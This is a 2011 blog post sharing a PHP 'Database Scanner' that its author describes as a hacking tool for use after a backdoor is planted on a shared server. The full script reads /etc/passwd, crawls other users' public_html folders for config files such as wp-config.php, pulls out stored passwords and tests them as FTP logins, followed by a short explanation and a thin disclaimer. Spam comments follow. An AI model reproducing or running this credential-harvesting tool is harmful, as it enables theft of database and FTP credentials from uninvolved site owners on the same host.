bugishere

Database Scanner

Posted on: May 22, 2011

Hello. In this moment, I want to share a PHP syntax about Database Scanner.Actually this application is hacking tools for access other websites in one server. Believe or not, if you have gotten a website target and then you have uploaded your backdoor in your website target, you can upload this application for scan/search some types of databases in your server and you can check your the security of your server besides that you can reach the FTP Account fromother websites in one server. Ok, this is the script of database scanner :

<?php
echo “<html>”;
echo “<title>Database Scanner</title><body>”;
set_time_limit(0);
##################
@$passwd=fopen(‘/etc/passwd’,’r’);
if (!$passwd) {
echo “[-] Error : coudn’t read /etc/passwd”;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,”:”);
$username=substr($str,0,$pos);
$dirz=”/home/$username/public_html/”;
if (($username!=””)) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
############################################
echo “<br><br>”;
echo “<textarea name=’main_window’ cols=100 rows=20>”;
echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;
echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;
echo “[~] Searching for passwords in config.* files…\n\n”;
foreach ($users as $user) {
$path=”/home/$user/public_html/”;
read_dir($path,$user);
}
echo “\n[+] Done\n”;
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath=”$path$file”;
if (($file!=’.’) and ($file!=’..’)) {
if (is_readable($fpath)) {
$dr=”$fpath/”;
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’cfg.inc.php’) or ($file==’db_connect.php’)) {
$pass=get_pass($fpath);
if ($pass!=”) {
echo “[+] $fpath\n$pass\n”;
ftp_check($username,$pass);
} } } } } } } }
function get_pass($link) {
@$config=fopen($link,’r’);
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {
if (strrpos($line,'”‘))
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,'”‘)-(strpos($line,’=’)+3)));
else
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));
return $pass;
} } }
function ftp_check($login,$pass) {
@$ftp=ftp_connect(‘127.0.0.1’);
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;
}
else ftp_quit($ftp);
}}
echo “</textarea><br>”;
echo “</body></html>”;
?>

I hope the PHP syntax above isn’t used for cyber criminal. And writer doesn’t want to responsible with miuse of this applcation. This is only for testing your server only and not for exploitation your server. Ok I am going to explain the pieces of the syntax above.

1. This application can scan the server with directory /home/username/public_html

$dirz=”/home/$username/public_html/”;

$path=”/home/$user/public_html/”;

2. This application only detect the some types of databases with kind of CMS platforms. If you want detect other platform, please add the configuration file (file that connect the CMS with database) in its syntax.

if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’cfg.inc.php’) or ($file==’db_connect.php’))

3. This application runs on linux server. with the website clients are located in the /home directory

Bye.😀

12 Responses to "Database Scanner"

[…] bugishere footnotes for inspiration HomeAbout RSS ← Database Scanner […]

Hey forum leute

krankenversicherung wechseln and pkv online rechner
krankenversicherungen im vergleich

private kv
Benjamin

[…] don’t know, why my old database scanner can’t be used now. So I’m going to share my other database scanner used to […]

boudzqvvhimijavkdedmfchntyz, Amazon Coupons, wcbgmjwaw, Amazon Discount, vCMxyzpyh, http://theprofitspy-reviews.net/ Amazon Discount Coupons, pfPftfbft, Amazon Gift Card, fbGngOfZO, Amazon Discounts, CyQQBxiEq, http://thesimplegolfswing-scam.net/ Amazon Deals, PGxwQoKfJ, Amazon Coupon, kbSceYLEH, Amazon Discount Code, NSCzHvcBh, http://themagicofmakingup-scam.net/ Amazon Discount Codes, pcYwfoqxl, Amazon Christmas, kHvaXbxnr, Amazon Christmas Presents, XBHmEsndG, http://thesixfigurecode-reviews.net/ Amazon Christmas Deals, AuKjIGNcf, Amazon Gifts, jZZJhbjwv, Amazon Christmas Ideas, JRSITKQZb, http://whitehatcopycat2-reviews.net/ Amazon Cheap Deals,MyOngmcAR, Amazon Deal of the Day, XoIvglzPG, Amazon Deals of the Day, JwqyotDhx, http://whitehatcopycat2-reviews.net/ Amazon Shopping Ideas, LrHJtaPRy.

xyfqvcvhjtifsf, ibxhncolps , [url=http://www.syzjxpqsch.com]orruuzjjfd[/url], http://www.bifzjcyqxy.com ibxhncolps

nqzzwcvhjtifsf, jdxgvfonjq , [url=http://www.sjzexufddj.com]lbrcbletmn[/url], http://www.rtxeechcsr.com jdxgvfonjq

zcsefcvhjtifsf, lolemvpuxg , [url=http://www.pnsnwpdval.com]ggkncvvsey[/url], http://www.tducllvvgu.com lolemvpuxg

jgghacvhjtifsf, [url=http://www.bmoqllvqgn.com]ngaqrhtxnz[/url]

Great work thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: